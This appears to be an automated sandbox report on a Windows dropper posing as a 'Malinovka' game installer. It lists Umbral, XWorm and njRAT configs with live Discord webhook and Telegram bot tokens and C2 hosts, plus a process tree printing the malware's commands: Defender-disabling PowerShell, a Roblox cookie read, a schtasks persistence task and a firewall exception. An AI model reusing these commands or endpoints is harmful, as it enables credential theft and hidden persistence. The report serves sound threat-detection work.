Analysis

  • max time kernel
    600s
  • max time network
    598s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-04-2024 15:25

General

  • Target

    Result.exe

  • Size

    422KB

  • MD5

    d4a25a5c3c21cb009ce03b1679f792f1

  • SHA1

    58c1759d4f82240d90cc9c5fb4a9f2f6d7dbc6a4

  • SHA256

    c1032817c3b6733dccbfe475c4ab3313981410387f518ae06cbbfcf7a51674c6

  • SHA512

    4feee7be209d0a7d6f7e005005af8a49f578c12dee9941f743513ac065e5b89e2e3ca3cbea2288d3150ceb0f8b782665429a7dcc046be93bcd109deaddb24d95

  • SSDEEP

    12288:YoZRL+EP8DDUgoOJBiLHaIJtMQIL/57qDYHN:8I8HUgoOJBiLHaIJtMQK7N

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Extracted

Family

xworm

C2

phentermine-partial.gl.at.ply.gg:36969

Attributes
  • Install_directory

    %AppData%

  • install_file

    Client.exe

  • telegram

    https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y

Extracted

Family

njrat

Version

0.7d

Botnet

Paxankor

C2

hakim32.ddns.net:2000

phentermine-partial.gl.at.ply.gg:36969

Mutex

9e134de821c32c6ed483f39ec83528df

Attributes
  • reg_key

    9e134de821c32c6ed483f39ec83528df

  • splitter

    |'|'|

Signatures

  • Detect Umbral payload 5 IoCs
  • Detect Xworm Payload 5 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Drops startup file 6 IoCs
  • Executes dropped EXE 14 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Result.exe
    "C:\Users\Admin\AppData\Local\Temp\Result.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
        "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4580
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
          4⤵
          • Views/modifies file attributes
          PID:4592
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4212
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2032
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4716
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
            PID:2732
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            4⤵
              PID:2288
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
                PID:4248
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:3104
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4648
                • C:\Windows\system32\PING.EXE
                  ping localhost
                  5⤵
                  • Runs ping.exe
                  PID:4732
            • C:\Users\Admin\AppData\Local\Temp\XClient.exe
              "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
              3⤵
              • Drops startup file
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4544
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
                4⤵
                  PID:1220
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                  4⤵
                    PID:420
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
                    4⤵
                      PID:4400
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
                      4⤵
                        PID:4512
                      • C:\Windows\System32\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
                        4⤵
                        • Creates scheduled task(s)
                        PID:4352
                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                    2⤵
                    • Drops startup file
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3200
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
                      3⤵
                      • Modifies Windows Firewall
                      PID:1652
                • C:\Windows\system32\taskmgr.exe
                  "C:\Windows\system32\taskmgr.exe" /4
                  1⤵
                    PID:4600
                  • C:\Windows\system32\taskmgr.exe
                    "C:\Windows\system32\taskmgr.exe" /4
                    1⤵
                      PID:2288
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:1548
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:2528
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:3708
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:3436
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:3760
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:4124
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:4520
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:1220
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:4204
                    • C:\Users\Admin\AppData\Roaming\Client.exe
                      C:\Users\Admin\AppData\Roaming\Client.exe
                      1⤵
                      • Executes dropped EXE
                      PID:656

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

                      Filesize

                      654B

                      MD5

                      16c5fce5f7230eea11598ec11ed42862

                      SHA1

                      75392d4824706090f5e8907eee1059349c927600

                      SHA256

                      87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

                      SHA512

                      153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      Filesize

                      3KB

                      MD5

                      ad5cd538ca58cb28ede39c108acb5785

                      SHA1

                      1ae910026f3dbe90ed025e9e96ead2b5399be877

                      SHA256

                      c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                      SHA512

                      c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      5a9b97538363bc5ab5f3d92352560061

                      SHA1

                      70815f2fbacb2fd9a59fadb9110ec2d96b8ef533

                      SHA256

                      4e00cb8ba8e2f1b9c9fb7c1af39f1bfcfaf32f9f2e476ff3897ee17bc477b23c

                      SHA512

                      7974155b3ea099fee0ac3e12ffe5a3427ef2fdd448b5cfe9c17a4af399db9a84e48abe73b9b7bc6d66e7e5774d1e6c15d3135540aa4085973408b41db6b45ff4

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      8c5fff2c090f31e158e97938c720ee9f

                      SHA1

                      324055be6148591f0928ce320b6c325b3f8bb0a8

                      SHA256

                      700f8375b5760e1c4c2eedd335fe3dc1097281424b52a8f9e918d0a78dcb65b5

                      SHA512

                      0502bc8345c14c0ced566a9afc8210172f49c48cb1c551fb27105311498e79e03b634fbcbbd4a5ce09490b1ca052e813b68d18e93e215ddae3fb983616a29ea3

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      f3bde5dba3f8b6083eec8169823ce3a3

                      SHA1

                      1a4581fd14a07f64075d90791a25959e8afae332

                      SHA256

                      1266b3e994f64e316900166fd67d5d1bd58b35ed4ef52dda31b9a97cbf482678

                      SHA512

                      210670295949ae8733e79e10494f723728cd7bf9560636f397d0f966282d3619b234f2886c2f9eea1f2021b3b7bd28347d813d45915d04bd8269a67df920cea1

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      59649da1edf059761abb0865a6a4785f

                      SHA1

                      142dc13d01a0f4919704e7b42e2bc0b2d80068ff

                      SHA256

                      27678235ba9f6202a0788bb00e673ef29c129d1f7ed39c6b3711a9152cd0f8ff

                      SHA512

                      b8ca5e8039ad28f11bd4aa674deea7b810bd4934b90ff703a1b89f713bfad1444b82924cda5a0ac0a008294ef72d1dc58c29f1eb809f61f24c59e4b26622ee3a

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      86145a4983c4d894c0c9dd9e4ff0f009

                      SHA1

                      a8e43fd7b070bc11476242e1f2714f54dcbc8276

                      SHA256

                      ff54b5d1dc749af3a3d46b39d5feeba746aa89bf3810a093cf5aa8259866a620

                      SHA512

                      124159cd441b05d456f38e38329a14503c6cd59d48fffa30c32f71a0fd11b1d820297ade894ec6667ba8460115a05305a7e1aae6004f18f9ca24713cbc98dd0f

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      d928f90923f5ff9d64502694f33643fd

                      SHA1

                      e6b682eda4540554b331988e3d84d41c49084490

                      SHA256

                      e72f59277c81b40e98abf39268d6eed8dbbf1c8e092e224df750e8e136a2784a

                      SHA512

                      476f2ae43e6a70a0bf92754945b1d757c0d5b421e80d09e3ecdcb80baf3a2a6b9dec226c91f0e0f8cbb23e59197fa734459942116dd59b084353c36438082f50

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      f4cebace363955b5fb79b606d1252b9e

                      SHA1

                      f57eb08ca60074896c6d65c98e2f8b99450f7aee

                      SHA256

                      ba0bf3227005c611f8d0d8ad6c73089c086e94019641f0fc14a303c760b6928a

                      SHA512

                      5d63af7b9754546535b86504494ffc6eb0ad79653f148ce4a2e9199badbdf582fac30c31dfeecf79b9d67b21b779d5e4132da8884e1d365c1ca380c719f1a52f

                    • C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe

                      Filesize

                      319KB

                      MD5

                      f69924b642ac4b9ef1dfacdfd43759a9

                      SHA1

                      95da50564c7cbc3749148419c68a08b0f2869ee1

                      SHA256

                      d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

                      SHA512

                      2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

                    • C:\Users\Admin\AppData\Local\Temp\Server.exe

                      Filesize

                      93KB

                      MD5

                      ba71f783926cbda30d8ff8f295fdd312

                      SHA1

                      bd533cc6457836098ff34d07ab2ef6b04ef144b9

                      SHA256

                      c6caa8ccc6ac706820712f93ea3a2541da32ec04542b3b7a85d8d85b0f0e1831

                      SHA512

                      19767768012b07f3a13dc3e3652c9c3b6376d3ec6199ad384f7011f6db3c6b2e11bff86979d0475a7b58e84e100126661954a667a8217655439aff73b374d5c9

                    • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

                      Filesize

                      229KB

                      MD5

                      7a902c87a60986f18a6b097712299256

                      SHA1

                      2c01906a39faa9d27a41e0d3cd84e92410b9c483

                      SHA256

                      e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5

                      SHA512

                      c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6

                    • C:\Users\Admin\AppData\Local\Temp\XClient.exe

                      Filesize

                      80KB

                      MD5

                      3fc932775533f1bcea180de679a902dd

                      SHA1

                      3f393d02af4653e34bf5526ec5b6f8d6e4df65e8

                      SHA256

                      09a15daeebc228706f36a7659284ef673ea72e7a71700a2f73f4f1409486dd6a

                      SHA512

                      f59d35a6fe5517a5b9a1ec9a07899eef9f48745710196f1824cc79823994d6fba7975da457ee06ec6215f56860680dc0c07412268c2b1c725c4c66611a75a764

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oul5lr4x.ghl.ps1

                      Filesize

                      1B

                      MD5

                      c4ca4238a0b923820dcc509a6f75849b

                      SHA1

                      356a192b7913b04c54574d18c28d46e6395428ab

                      SHA256

                      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                      SHA512

                      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                    • memory/1412-10-0x0000000000400000-0x0000000000471000-memory.dmp

                      Filesize

                      452KB

                    • memory/2016-22-0x0000000000400000-0x0000000000457000-memory.dmp

                      Filesize

                      348KB

                    • memory/3200-24-0x00000000031B0000-0x00000000031C0000-memory.dmp

                      Filesize

                      64KB

                    • memory/3200-395-0x00000000031B0000-0x00000000031C0000-memory.dmp

                      Filesize

                      64KB

                    • memory/4212-33-0x0000013F6E7A0000-0x0000013F6E816000-memory.dmp

                      Filesize

                      472KB

                    • memory/4212-30-0x0000013F6E5E0000-0x0000013F6E602000-memory.dmp

                      Filesize

                      136KB

                    • memory/4544-23-0x0000000000F70000-0x0000000000F8A000-memory.dmp

                      Filesize

                      104KB

                    • memory/4544-409-0x0000000001650000-0x000000000165C000-memory.dmp

                      Filesize

                      48KB

                    • memory/4580-124-0x000001D56F9D0000-0x000001D56F9EE000-memory.dmp

                      Filesize

                      120KB

                    • memory/4580-123-0x000001D571310000-0x000001D571360000-memory.dmp

                      Filesize

                      320KB

                    • memory/4580-188-0x000001D5712C0000-0x000001D5712CA000-memory.dmp

                      Filesize

                      40KB

                    • memory/4580-189-0x000001D5712F0000-0x000001D571302000-memory.dmp

                      Filesize

                      72KB

                    • memory/4580-21-0x000001D56F530000-0x000001D56F570000-memory.dmp

                      Filesize

                      256KB